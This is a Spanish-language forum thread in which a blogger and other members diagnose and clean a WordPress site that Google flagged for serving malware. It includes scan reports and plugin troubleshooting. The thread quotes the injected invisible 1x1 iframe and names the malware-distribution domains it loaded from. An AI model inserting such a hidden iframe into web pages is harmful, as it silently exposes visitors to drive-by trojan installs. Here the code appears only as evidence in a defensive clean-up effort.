En el hilo de la Raspberry pi hay alguien que tiene una firma o link que apunta a esa pagina:

Es _-Caleb-_. A ver si se pasa y confirma el problema. Si no dice nada en un rato modificaré su firma para quitarlo de forma temporal.

Es _-Caleb-_. A ver si se pasa y confirma el problema. Si no dice nada en un rato modificaré su firma para quitarlo de forma temporal.

Asias!

no tengo pc, ha petado, no se que puede ser, anarchy porfa modifica mi firma que voy con el mvl, cuando llegue a casa lo miro dsd el netbook a ver que puede ser...

< - >
alguien tiene alguna idea? porque no toco nada del blog, plugins, etc hace meses

Lo cierto es que google te tiene marcada la web como peligrosa, así que algo chungo tienes alojado.

pues no lo se, borrare todo e instalare wordpres u otro again, joer k marron y encima voy sin saldo

Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-02-04, and the last time suspicious content was found on this site was on 2012-02-04.

Malicious software includes 2 trojan(s). Successful infection resulted in an average of 4 new process(es) on the target machine.

Malicious software is hosted on 3 domain(s), including dia89online.osa.pl/, virtualpatro.osa.pl/, gotovikrabote.bee.pl/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including gotovikrabote.bee.pl/.

This site was hosted on 1 network(s) including AS16276 (OVH).

Primer consejo, desactivar todos los enlaces externos para asegurarte de que no tienen relación. He mirado la IP en la que se aloja tu dominio y curiosamente me lleva directo al webmail de OVH, es eso normal? He mirado el código fuente de tu web y a primera vista no he apreciado nada raro. Imagino que has enlazado con algo de una web externa en alguna de tus entradas.

gracias xcode tio, esta tarde quitare todos los enlaces, incluyendo afiliados, a ver que pasa, esos datos son de la pagina de google?

O eran de Google o eran de Mozilla, no lo recuerdo en este momento, pero seguí el enlace del aviso en firefox hasta llegar a eso :)

Vale... este es el reporte de google:

Código insertado sospechoso Casos
<iframe src="http://gotovikrabote.bee.pl/iframe.php?id=535"
width="1" height="1">

Si intento descargarme el index.php no me sale.. alguien sabe donde **** mirar eso?

Porque en el código fuente (en el navegador) está en la primera linea..

Y alguien tiene idea de COMO COÑO ha entrado eso?

Saludos!

Pues probablemente el tema de diseño o un plugin - imagino :)

Y yo no lo vi en el codigo fuente, voy a probar de nuevo por curiosidad :S

He mirado todos los archvos del tema incluidos los css y no encuentro esta cadena: gotovikrabote.bee.pl así que nos e donde buscar... por lo pronto voy a desactivar y desinstalar todos los plugins que no uso... famigo x-code.... i need help!

Es un proceso simple de eliminación, una vez localizado el culpable los demas pueden ser reactivados... sin miedo y tal, todas las hermanas fueron valientes y todos los hermanos unas nenazas, es la guerra!... y tal :lol:


Enga, si me necesitas por aqui ando :lol2:

por lo pronto estoy intentando actualizar wordpress a la última versión prque solo un bug de la versión que tengo explica la mierda esta....

te importaría si te paso los datos de acceso y echas un ojo?

Ok's, envia :brindis:

el ftp

ftp.lahabitaciondekazuki.es

user ******
pass ********

admin de wordpress

user ********
pass ******

Tienes un MP :)

Acabo de actualizar...

< - >
***** yo siempr que digo que LHDK es una mierda me ha dado el día....

Estoy mirando... en principio no veo nada sospechoso xD

Estoy mirando... en principio no veo nada sospechoso xD

Intenta evitar las fotos en las que salgo con la máscara de cuero xDDDD

mmm por lo visto el script puede estar codificado de alguna manera así que no se que buscar....

Tras actualizar a la última versión he pedido a google una revisión del sitio a ver que sale... :((((

alguien tiene alguna idea? porque no toco nada del blog, plugins, etc hace meses

mira que alguien no te haya inyectado algo via algun hack, a mi me metieron un frame de 1x1 que era casi invisible y que hacia Dios sabe que. Pero si google te ha "marcado" es que algo asi tienes.

Creo que pinchando en el enlace en google te pone algo como "si eres el webmaster pincha aqui" y te explica alguna pista de lo que han encontrado de malo en tu web.

Aiken

< - >

Si intento descargarme el index.php no me sale.. alguien sabe donde **** mirar eso?Porque en el código fuente (en el navegador) está en la primera linea..
Y alguien tiene idea de COMO COÑO ha entrado eso?
Saludos!

lo que te decia, te han metido un frame de 1x1.
En mi caso, aprovecharon un bug, se crearon un usuario admin y hicieron ese cambio en la plantilla.

Asegurate que no tienes algun usuario admin que no hayas creado en tu lista de administradores.

Y actualiza la version del software del blog, porque han entrado por un bug seguro.
Aiken

< - >

He mirado todos los archvos del tema incluidos los css y no encuentro esta cadena: gotovikrabote.bee.pl así que nos e donde buscar... por lo pronto voy a desactivar y desinstalar todos los plugins que no uso... famigo x-code.... i need help!

instalate firebug, o algun plugin de firefox/chrome de esos que te miden la velocidad de tu web y que te sacan un listado de todas las imagenes que se descarga al cargar una pagina tuya, y en el listado seguro que aparece el gotovigote este y te dice incluso donde.

de hecho porque en casa solo tengo windows y no quiero arriegarme al troyano, si tuviera windows te lo miraba con firebug. si me acuerdo en el curro mañana y no te lo ha mirado nadie, te lo echo un vistazo.

Aiken

Gracias aiken, he mirado lo de los usuarios y no hay ninguno.....

Podría ser algún plugin? porque otra cosa ya no se me ocurre.... y desde luego, yo no he sido :(

< - >
Estoy con el firebug pero ahora no sale la mierda esta.... se habrá desinstalado al quitar algún plugin de los que tenía activado pero no implementado?

< - >
Oh wait que hay un montón de cosas por expandir... madre de dios....

< - >
Cuando X-Code finalice pasaré a actualizar todo lo que tengo por actualizar... joer tios que estrés estoy pasando con la mierda del blog

Yo apuesto por el tema plugin, he mirado con firebug, he mirado de hecho varios de los archivos principales de WP, también he mirado cosas que no suelo ver en instalaciones WP, y solo se me ocurre - por ahora - que pueda ser un plugin.

Tampoco es que ande muy fino hoy, pero yo probaría desactivando los plugins uno a uno, y si falla eso, probaría con otro diseño - que por probar solo se pierde un poco de tiempo como mucho :)

edit: Y ya he salido por cierto xD :brindis:

He mirado en esta web: http://jsunpack.jeek.org que parece que localiza malware, este incluido... pero no detecta nada creo...

< - >
Solo detecta esto como sospechoso:


lahabitaciondekazuki.es/wp-content/plugins/tweetmeme/button.js suspicious
[suspicious:2] (ipaddr:87.98.231.87) (script) lahabitaciondekazuki.es/wp-content/plugins/tweetmeme/button.js
status: (referer=www.lahabitaciondekazuki.es/)saved 3779 bytes 47cdff93057b80fcf9085e3005f1fe983bb0fda7
info: [javascript variable] URL=api.tweetmeme.com/button.js?url=
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
info: file: saved lahabitaciondekazuki.es/wp-content/plugins/tweetmeme/button.js to (47cdff93057b80fcf9085e3005f1fe983bb0fda7)
file: 47cdff93057b80fcf9085e3005f1fe983bb0fda7: 3779 bytes
file: 3602268c02c9940f9edc75baecd6361782a0f8fd: 4057 bytes
file: f9287c5e22c263b45128e2e49d0e57085a2a79ea: 4063 bytes
file: ab43e9719d3f5bffd39ac07c22f3de5859db17c3: 4272 bytes
file: d0ff7063c8ee268603e61e3ca72d0a884a2e683f: 4464 bytes
file: 772a793c70880b61d85b2d7c76868be420a07001: 4178 bytes
file: c3cbb9a745a6c813d2da3f8fb6e48e316f06398f: 4302 bytes

Una duda un poco off-topic, ¿por qué le pusiste ese nombre a la página? Es que yo viendo ese nombre pensaba que era una de las páginas que recomienda pache para cuando está solo xD

Saludos.

Aquí el análisis completo

http://jsunpack.jeek.org/css/?report=1f95ecd94376ed82d2e520f8c39f4ea9153a9e82

< - >

Una duda un poco off-topic, ¿por qué le pusiste ese nombre a la página? Es que yo viendo ese nombre pensaba que era una de las páginas que recomienda pache para cuando está solo xD

Saludos.

Es algo raro: verás, donde vivo ahora no tengo casi amigos que compartan esta afición, y a mi novia de juegos ni hablarle así que me creé un rincón (la habitación) y un personaje (Kazuki) para escribir de lo que me diese la gana relacionado con este mundillo :)

Simple y llanamente, Kazuki por Kazuki Fuse, el protagonista de Jin Roh :) que también es mi nick en el delta force :)

Pues yo tengo tweetmeme y no me lo ha detectado como sospechoso pero si como benigno :)



w*w.unbarrilmediolleno.com/wp-content/plugins/tweetmeme/button.js benign
[nothing detected] (script) w*w.unbarrilmediolleno.com/wp-content/plugins/tweetmeme/button.js
status: (referer=www.unbarrilmediolleno.com/archives/tag/victima)saved 3779 bytes 47cdff93057b80fcf9085e3005f1fe983bb0fda7
info: [javascript variable] URL=api.tweetmeme.com/button.js?url=
info: [decodingLevel=0] found JavaScript
error: undefined variable nodes
file: 47cdff93057b80fcf9085e3005f1fe983bb0fda7: 3779 bytes



No se a que viene lo de ese error xD

Perfecto: He actualizado los plugins y he petado la web...

MODO PÁNICO!


error: Call to undefined function register_setting() in /homez.227/lahabitas/www/wp-content/plugins/zenphoto-gallery/zenphoto_gallery.php on line 80

mira que alguien no te haya inyectado algo via algun hack, a mi me metieron un frame de 1x1 que era casi invisible y que hacia Dios sabe que. Pero si google te ha "marcado" es que algo asi tienes.

Creo que pinchando en el enlace en google te pone algo como "si eres el webmaster pincha aqui" y te explica alguna pista de lo que han encontrado de malo en tu web.

Aiken

< - >


lo que te decia, te han metido un frame de 1x1.
En mi caso, aprovecharon un bug, se crearon un usuario admin y hicieron ese cambio en la plantilla.

Asegurate que no tienes algun usuario admin que no hayas creado en tu lista de administradores.

Y actualiza la version del software del blog, porque han entrado por un bug seguro.
Aiken

< - >


instalate firebug, o algun plugin de firefox/chrome de esos que te miden la velocidad de tu web y que te sacan un listado de todas las imagenes que se descarga al cargar una pagina tuya, y en el listado seguro que aparece el gotovigote este y te dice incluso donde.

de hecho porque en casa solo tengo windows y no quiero arriegarme al troyano, si tuviera windows te lo miraba con firebug. si me acuerdo en el curro mañana y no te lo ha mirado nadie, te lo echo un vistazo.

Aiken

Añado, si tienes un wordpress actualiza los plugins, y si puedes actualizar el mysql hazlo también. En algunas ocasiones es por un bug en mysql.

Ya está solventado el error...

menos mal que era solo borrar esa linea y eliminar ese plugin (que no usaba)

Gracias dardo pero el mysql depende del hosting creo....

< - >
Ahora a re-hacer la cabecera.... a ver si me curro algo xD

Ya está solventado el error...

menos mal que era solo borrar esa linea y eliminar ese plugin (que no usaba)

Gracias dardo pero el mysql depende del hosting creo....


Depende del plan de hosting, obviamente, si alquilas un dedicado le instalas lo que quieras en la versión que quieras, pero claro, tienes que estar tu pendiente de actualizarlo y eso.

Con respecto al wordpress lo dejé porque no le veo la seguridad por ninguna parte, entre temas que vienen con el pie codificado en base64 para que los novatos no los editen y queten los créditos, millones de plugins que hacen lo mismo y son superintrusivos... cuanto más fácil es la modificación con unos pocos cicks más fácil es meter algún bicho malo, o no bueno.

Además hay muchos plugins que conectan con sitios externos. Un día me di cuenta que mi blog de wordpress cargaba script de una decena de sitios que yo no conocía y fue el momento que dije adios.

Curiosamente pensaba en esto mismo el otro dia, eso por no mencionar la absoluta falta de ritmo del panel administrsativo... Como poco te quita las ganas de escribir entradas :lol2:

Por mi parte voy a estudiar alternativas en cuanto disponga de algo de tiempo libre :)

Depende del plan de hosting, obviamente, si alquilas un dedicado le instalas lo que quieras en la versión que quieras, pero claro, tienes que estar tu pendiente de actualizarlo y eso.

Con respecto al wordpress lo dejé porque no le veo la seguridad por ninguna parte, entre temas que vienen con el pie codificado en base64 para que los novatos no los editen y queten los créditos, millones de plugins que hacen lo mismo y son superintrusivos... cuanto más fácil es la modificación con unos pocos cicks más fácil es meter algún bicho malo, o no bueno.

Además hay muchos plugins que conectan con sitios externos. Un día me di cuenta que mi blog de wordpress cargaba script de una decena de sitios que yo no conocía y fue el momento que dije adios.

Yo esta tarde me he planteado muy seriamente crear una página con marcos en html e ir editando mediante frontpage (y no, no es coña) porque menudo día...

Ahora está todo actualizado, la cabecera ha vuelto a su sitio (Gracias caché de firefox) y nada... por lo pronto los análisis no revelan nada, he desinstalado muchos plugins que no usaba (mas de 10) y he pedido a google que re-analice el sitio de nuevo...

a ver que pasa

Saludos y gracias a todos!

***** que putadon! Espero que se solucione todo pronto.

***** que putadon! Espero que se solucione todo pronto.
Nonosleemoselhilofanclú

Nonosleemoselhilofanclú

Que es lo que no he leido capullo? Xdd Esque no has visto que aun tiene problemas con los mierdas de google?

Que es lo que no he leido capullo? Xdd Esque no has visto que aun tiene problemas con los mierdas de google?

Esta solucionado solo hace falta que google lo revise ! A7points! :p

Esta solucionado solo hace falta que google lo revise ! A7points! :p

eso ya lo he leido yo mismo. Por eso le digo que a ver si se soluciona pronto ya!

no peleeis xDD

< - >
pues a ver que dicen google porque tengo que publicar cosillas estas 2 semanas ;)

< - >
Vale, ya está arreglado:

La entrada de disculpas:

http://lahabitaciondekazuki.es/?p=902


Buenas amigos, pues bien, resulta que llevo 2 días sin PC (debido a una avería) cuando ayer por la mañana, sobre las 10:30 de la mañana y presa de las ansias de información me dio por entrar al foro de Gp32spain mediante mi móvil WAP, al entrar compruebo que tengo mas de 1000 mensajes nuevos sin leer, me lo tomo con calma, empiezo a mirar la portada y veo que el amigo nandove avisa de una alarma de google derivada de LHDK (en este hilo) tras gastarme un pastizal en saldo (Si, tengo un móvil baratuno de prepago) voy leyendo y contestando los diferentes mensajes del hilo, todo esto, como no podía ser de otra manera según Murphy, en el trabajo.

Al llegar a casa (20:00) me pongo a trabajar con las herramientas para webmaster de google, porque pensé yo, "si tienen herramientas de detección imagino que también tendrán alguna de limpieza o información sobre cómo actuar..."

Google dice que el malware redirige a gotovikrabote.bee.pl”, efectivamente, miro el código fuente de la web y aparece, tras buscar una redirección a esta web sin éxito opto por actualizar todo wordpress y pedir ayuda, X-Code, webmaster de www.unbarrilmediolleno.com me echa un cable y se convierte desde ya mismo en mi muy mejor amigo. Aunque he de agradecer también los consejos del resto de foreros que fueron indicándome cosas en un mundo para mi desconocido. Al final no encontramos nada, ni rastro del script, ni de la redirección ni nada, así que he pedido a google que vuelva a comprobar la web. (22:15)

En fin amigos, la alarma residía en ese script, que posiblemente infectó el blog por algún bug en mi versión desfasada de Wordpress o en alguno de sus plugins… y tras solucionarlo, pasar una revisión de google sin resultados malignosyq (y actualizar todo, prescindiendo de lo que no usaba) escribo estas líneas de disculpa por las molestias que haya podido ocasionaros, esperando que no vuelva a repetirse ningún caso similar, nunca.

De nuevo mis disculpas si esto ha ocasionado problemas a alguno, Kazuki.

¡Saludos!

pues me alegro de que AHORA SÍ este todo solucionado.

Me congratula sobremanera el leer que la cosa se ha solucionado con exito y prontitud hermano _-Caleb-_ :brindis:

ME GUSTA!

Eso si con la tonteria has conseguido mas visitas que nunca :p

Ahora te mandaremos a la hogera por microblogging! XDDDDD

Pero no te preocupes, en GP32spain semos así, porculeros per natura!:lol:

ME GUSTA!

Eso si con la tonteria has conseguido mas visitas que nunca :p

Ahora te mandaremos a la hogera por microblogging! XDDDDD

Pero no te preocupes, en GP32spain semos así, porculeros per natura!:lol:

No se por qué xDDD si total, casi todo lo publico en el blog de gp32spain también :P

Y es mas publicidad para H-G!

< - >
Encima a 1280 * 1024 queda mu bonika la web xDDD

Esta solucionado solo hace falta que google lo revise ! A7points! :p



¡Vaya! Google Chrome no ha podido encontrar la página www.xn--lahabitacindelazuki-94b.es.


No se si es que la tilde y mi firefox de linux no se llevan bien, o que algo no esta bien del todo.

Aiken

no se si es que la tilde y mi firefox de linux no se llevan bien, o que algo no esta bien del todo.

Aiken

eing?!

< - >
Ahora falla el rss xDDD


Ha fallado la revisión XML

Ha fallado la revisión XML: error de sintaxis (Línea: 12, Carácter: 32)

Analizar otra vez como HTML
Error:
well-formedness constraint: entity declared
Indicación:
http://www.w3.org/TR/REC-xml/#wf-entdeclared
9: >
10:
11: <channel>
12: <title>La Habitación de Kazuki &raquo; La Habitación de Kazuki</title>
13: <atom:link href="http://lahabitaciondekazuki.es/?feed=rss2" rel="self" type="application/rss+xml" />
14: <link>http://lahabitaciondekazuki.es</link>
15: <description>El blog de Kazuki</description>

http://www.youtube.com/watch?v=3khTntOxX-k

Pues aqui si funcionaba bien, www.xn.lahabitacindelazuki.93c.es (http://gp32spain.myminicity.com/sec) curiosamente :D

Pues aqui si funcionaba bien, www.xn.lahabitacindelazuki.93c.es (http://gp32spain.myminicity.com/sec) curiosamente :D

No se por qué antes de darle miré la URL... me lo vi venir con tiempo xDDD

Es que no es la correcta? :lol:

JJAJAJJAJA

Oye alguien tiene alguna idea de qué **** debo modificar para que el rss vaya bien? xD

< - >
http://www.youtube.com/watch?v=TU7JjJJZi1Q

quita '&raquo;' :D

quita '&raquo;' :D

Eso es lo que he preguntao !!! de qué ´fichero?!?!?!

Espera que lo miro :lol:

Espera que lo miro :lol:

Si es que soy un pátetico webmaster ya lo sé, aunque lo compenso con mis buenas entradas, mi saber hacer, mi carisma y mi modestia xDDDDDDDD[wei]

Aunque lo que yo he hecho de forma provisional es una chapucilla que funcionará sin problemas, te recomendaría mirar en la configuración de wordpress en la propia base de datos, algo me dice que la cadena en cuestión está por esos lares :lol2: :brindis:

Yo es que como soy mas de destrozar que de solucionar lo dejaré tal cual... no sea que la lie parda de nuevo... :)

Muchas gracias de nuevo tio, te debo una botella de ron! :)

Caleb, eso es una señal. Abandona tu blog y definitivamente escribe en pixelacos xDDDDDDD

Caleb, eso es una señal. Abandona tu blog y definitivamente escribe en pixelacos xDDDDDDD

Juas serás! xDDD jajaja al final no ha quedado bien del todo :( a ver que pasa :P